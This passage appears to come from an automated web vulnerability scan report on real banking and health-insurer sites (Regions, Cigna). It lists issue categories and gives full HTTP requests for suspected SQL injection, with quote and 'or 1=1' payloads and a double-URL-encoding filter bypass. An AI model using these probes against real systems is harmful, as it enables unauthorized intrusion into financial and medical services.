14.7. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js

14.8. https://securebank.regions.com/favicon.ico

14.9. https://securebank.regions.com/images/btnContinue.gif

14.10. https://securebank.regions.com/images/equalhousing.gif

14.11. https://securebank.regions.com/images/green/rf_logo.gif

14.12. https://securebank.regions.com/images/red_arrow.gif

14.13. https://securebank.regions.com/images/spacer.gif

14.14. https://securebank.regions.com/login.aspx

14.15. https://securebank.regions.com/script/regions.js

14.16. https://securebank.regions.com/styles/styles.AmSouth.css

14.17. https://securebank.regions.com/styles/stylesprint.css

14.18. http://www.google.com/uds/solutions/slideshow/gfslideshow.js

14.19. https://www.paperg.com/post.php

14.20. http://www.placelocal.com/css/ui.all.css

14.21. http://www.placelocal.com/js/includes/jquery-ui-personalized.js

14.22. http://www.regions.com/about_regions/email_fraud.rf

14.23. http://www.regions.com/about_regions/report_fraud.rf

14.24. http://www.regions.com/personal_banking/online_security.rf

15. Private IP addresses disclosed

16. Social security numbers disclosed

16.1. http://assets.olark.com/a/assets/v0/site/4116-752-10-3079.js

16.2. http://www.placelocal.com/

16.3. http://www.placelocal.com/forgot_password.php

17. Credit card numbers disclosed

18. Robots.txt file

18.1. http://ajax.googleapis.com/ajax/services/feed/load

18.2. http://cigna.com/

18.3. http://feeds.bbci.co.uk/news/rss.xml

18.4. https://my.cigna.com/web/public/guest

18.5. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

18.6. http://themes.googleusercontent.com/image

18.7. http://www.blogger.com/dyn-css/authorization.css

18.8. http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html

18.9. http://www.frontrowusa.com/

18.10. http://www.google-analytics.com/__utm.gif

18.11. http://www.placelocal.com/forgot_password.php

18.12. http://www.regions.com/

18.13. https://www.regions.com/personal_banking.rf

19. Cacheable HTTPS response

19.1. https://cignaforhcp.cigna.com/

19.2. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

19.3. https://cignaforhcp.cigna.com/corp/sso/styles/portal_styles.css

19.4. https://cignaforhcp.cigna.com/wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp

19.5. https://my.cigna.com/

19.6. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

19.7. https://my.cigna.com/web/public/guest

19.8. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css

19.9. https://sso.corp.cigna.com/corp/sso/professional/controller

19.10. https://www.paperg.com/privacy.htm

19.11. https://wwwa.applyonlinenow.com/USCCapp/static/error.html

20. Multiple content types specified

21. HTML does not specify charset

21.1. http://cigna.com/sites/toolkit/managers_disability/home.htm

21.2. http://cigna.com/sites/toolkit/managers_disability/return/index.htm

21.3. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm

21.4. http://cigna.com/sites/toolkit/physicians_disability/index.htm

21.5. https://cignaforhcp.cigna.com/wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp

21.6. https://secureapps.regions.com/

21.7. https://sso.corp.cigna.com/

21.8. http://www.paperg.com/jsfb/embed.php

21.9. http://www.paperg.com/sitemap.php

21.10. http://www.paperg.com/sitemap/albany-times-union/1552.html

21.11. http://www.paperg.com/sitemap/app.com/1992.html

21.12. http://www.paperg.com/sitemap/arizona-daily-star/2955.html

21.13. http://www.paperg.com/sitemap/arizona-daily-sun/3027.html

21.14. http://www.paperg.com/sitemap/bay-area-parent---east-bay/88.html

21.15. http://www.paperg.com/sitemap/bay-area-parent---san-francisco/186.html

21.16. http://www.paperg.com/sitemap/bay-area-parent---silicon-valley/182.html

21.17. http://www.paperg.com/sitemap/bay-state-banner/59.html

21.18. http://www.paperg.com/sitemap/billings-gazette---billings-gazette/2701.html

21.19. http://www.paperg.com/sitemap/billings-gazette---thrifty-nickel/3878.html

21.20. http://www.paperg.com/sitemap/birmingham-parent-magazine/2431.html

21.21. http://www.paperg.com/sitemap/bismarck-tribune/3240.html

21.22. http://www.paperg.com/sitemap/boston-blogs/116.html

21.23. http://www.placelocal.com/api.php

21.24. http://www.xsnet.com/Portals/64787/footerStuff.html

22. Content type incorrectly stated

22.1. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

22.2. https://cignaforhcp.cigna.com/corp/sso/styles/portal_styles.css

22.3. https://cignaforhcp.cigna.com/wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp

22.4. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

22.5. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

22.6. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

22.7. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

22.8. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

22.9. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css

22.10. http://www.frontrowusa.com/favicon.ico

22.11. http://www.paperg.com/jsfb/embed.php

22.12. http://www.placelocal.com/api.php

22.13. http://xsinternational.app6.hubspot.com/salog.js.aspx

23. SSL certificate

23.1. https://cignaforhcp.cigna.com/

23.2. https://my.cigna.com/

23.3. https://secure.regionsmortgage.com/

23.4. https://secureapps.regions.com/

23.5. https://securebank.regions.com/

23.6. https://sso.corp.cigna.com/

23.7. https://www.frontrowusa.com/

23.8. https://www.paperg.com/

23.9. https://www.planservices.com/

23.10. https://www.regions.com/

23.11. https://wwwa.applyonlinenow.com/



1. SQL injection  next
There are 44 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77 cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

Issue detail

The PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme'; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:43:07 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 89
$wsep:
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 89

Error 500: Filter [ServletRequestUserContextIntegrationFilter]: could not be initialized

Request 2

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme''; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
...[SNIP]...

Response 2

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:43:08 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 107
surrogate-control: no-store
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000qHvYotF4MwXBdcIgBrutYk0:15ngp3rho; Path=/
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 107

...

<html>
<body>
Response

<hr>
Read 821 bytes in 1ms.

</body>
</html>

1.2. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [PageLoadMilliSecs XML attribute]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

Issue detail

The PageLoadMilliSecs XML attribute appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PageLoadMilliSecs XML attribute, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PageLoadMilliSecs XML attribute as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
<Info PageLoadMilliSecs="52340%2527" Version="2010.12.22.1" TimezoneOffset="300" />
<Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2"
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:35:43 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 89
$wsep:
Content-Length: 89

Error 500: Filter [ServletRequestUserContextIntegrationFilter]: could not be initialized

Request 2

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
<Info PageLoadMilliSecs="52340%2527%2527" Version="2010.12.22.1" TimezoneOffset="300" />
<Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2"
...[SNIP]...

Response 2

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:35:44 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 107
surrogate-control: no-store
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000O0GZYYfgJn585aj74wuL-Tq:15ngp3vj1; Path=/
Content-Length: 107

...

<html>
<body>
Response

<hr>
Read 831 bytes in 0ms.

</body>
</html>

1.3. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [Plugins XML attribute]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

Issue detail

The Plugins XML attribute appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Plugins XML attribute, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Plugins XML attribute as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
...[SNIP]...
Offset="300" />
<Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2" Images="9" Links="30" Plugins="1%2527" />
<Window WindowHref="https%3A//my.cigna.com/web/public/guest" WindowProtocol="https:" WindowHost="my.cigna.com" WindowHostName="my.cigna.com" WindowPathName="/web/public/guest" ClientSize="902x
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:39:06 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 89
$wsep:
Content-Length: 89

Error 500: Filter [ServletRequestUserContextIntegrationFilter]: could not be initialized

Request 2

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Render: 52340
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /web/public/guest
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6
Content-Length: 821

<ClientEventSet PostTimeStamp="1305559925541" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="52340" DateSince1970="1305559895540" PageId="ID10H30M43S200R0.1436611006502062" >
...[SNIP]...
Offset="300" />
<Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2" Images="9" Links="30" Plugins="1%2527%2527" />
<Window WindowHref="https%3A//my.cigna.com/web/public/guest" WindowProtocol="https:" WindowHost="my.cigna.com" WindowHostName="my.cigna.com" WindowPathName="/web/public/guest" ClientSize="902x
...[SNIP]...

Response 2

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 15:39:07 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 107
surrogate-control: no-store
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=00002szmChJl74C1QfR0t9jWnDT:15ngp45tc; Path=/
Content-Length: 107

...

<html>
<body>
Response

<hr>
Read 831 bytes in 1ms.

</body>
</html>

1.4. https://secureapps.regions.com/oao/app01.aspx [ctl00%24ContentPlaceHolder1%24txtPin parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secureapps.regions.com
Path:   /oao/app01.aspx

Issue detail

The ctl00%24ContentPlaceHolder1%24txtPin parameter appears to be vulnerable to SQL injection attacks. The payloads 15752462'%20or%201%3d1--%20 and 15752462'%20or%201%3d2--%20 were each submitted in the ctl00%24ContentPlaceHolder1%24txtPin parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /oao/app01.aspx?type=lifegreensavings HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreensavings
Cache-Control: max-age=0
Origin: https://secureapps.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; secureapps.regions.com-ssl=R54983192
Content-Length: 3109

__EVENTTARGET=&__EVENTARGUMENT=&DES_Group=FORMINPUT&__VIEWSTATE=xHIh9vjHCP7V7FlwYd0dybomkcrXFi85zGyDNyxO4%2FVfU4gFk56iSPraFK2Fb5m%2FVmSSQkqJSJ9Sd9dg4uCnywmz5oW6bxAuLaWjTNif0yED1YLSSBrlZTehbSWX1peYLbbL
...[SNIP]...
ntPlaceHolder1%24txtATMCheck1=&ctl00%24ContentPlaceHolder1%24txtATMCheck2=&ctl00%24ContentPlaceHolder1%24txtATMCheck3=&ctl00%24ContentPlaceHolder1%24txtATMCheck4=&ctl00%24ContentPlaceHolder1%24txtPin=15752462'%20or%201%3d1--%20&ctl00%24ContentPlaceHolder1%24txtExpirationDate=&ctl00%24ContentPlaceHolder1%24txtCDV=&ctl00%24ContentPlaceHolder1%24btnGetting_StartedContinue.x=30&ctl00%24ContentPlaceHolder1%24btnGetting_StartedCo
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:24:21 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 10137


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
STATE" id="__VIEWSTATE" value="ejI4XQ0S2loR+l0OfQ1EdYDWVJyr/6vzrIlcFy6iv8O0PXGX0SJfs2E9T7qPj3oS7yMo1fQ3FY1vVGgKbmM9qWeuCfRzvDvha896+i9Q7z+smQNa1zqYtlVwyXOyAhr/EmQZox2KsV02il8iDBCYlzXhyE4KFOtRfKPiQBsp8zA3sZUOZ+/OgG6twsfu23rD+gW4NPop1RPSdcFbhwcTSgPeVBUJ/folrEex+d+vcQOm59Y/FHY88pGfL0Qy5CS/nevKK2MnoS3P6KQX7KZW9w+D2O9En1e7+UCnBRMhRSNpJrXGuWCsCQ82ZY72cxl13MPsl6BNSLESeXF9uChAqyI/cqR9+5l4CgCzfOVj+yMv1ALZZ1cTc559vv4GoxgEteaAsn6oOd80UDh/BqVKqX/wKDWLlDkvFS58EnLKaNGahpPDsPd4iMFE7spltUOcTvczzKMm17c2kxBDWUpGM3/hIW4Ua5wPkCtk52wEGgx4mPjKqo4sGhHwoY68Sm7IAe8hYdom9u9kgGqKzQFplAhoi1AipL4xH8IAIIoPVhwzJ1gHf8erOzNXZD7ZZ9wFWMTPmUKDbcqEOFWvLsYeTVOYcBXwu6c5GRb1VfjL2w+W2A/axIlFmRR+sRtF1x23Tl9a4wHu/XfL5FU5j9v1AmDvMwc3/YFkqL7WFXCuD786o0eQ/IIcT3PS619tvBxdUfdPaOwunP7wKkUnHEHoP/GNaETqfu41w2riMmXdDybvBAKN3yhKrNv74eJzwuYC" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script type='text/javascript' src='/OAO/DESGetFiles.aspx?type=scripts&amp;version=4.0.5.5000&amp;files=0_51_54'></script>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="mM/j1zEOfB6kZtzISep0iH9URB0r1z3314846Pw1bUytvyBnguX6Ks8+yQE1+KlwZ2fXHb1aYI3H9kF279cMaw==" />
</div>
<div id="page">
<div id="mgMnuTop">
<div class="mnuTopLink">

<a title="Return to Regions.com" onclick="return HandleOnCancel();" target="_parent" href="javascript:__doPostBack('ctl00$ctl10','')">Return to Regions.com</a>
</div>
</div>
<div id="mgLogo">
<img src="https://www.regions.com/virtualMedia/img506.gif" alt="Regions Financial Corporation" />
</div>
<div id="mgBranding">
<div id="mgBrandSmall">
</div>
<div id="mgBrandLarge">
<h1 id="ctl00_h1AppTitle">Reg
...[SNIP]...

Request 2

POST /oao/app01.aspx?type=lifegreensavings HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreensavings
Cache-Control: max-age=0
Origin: https://secureapps.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
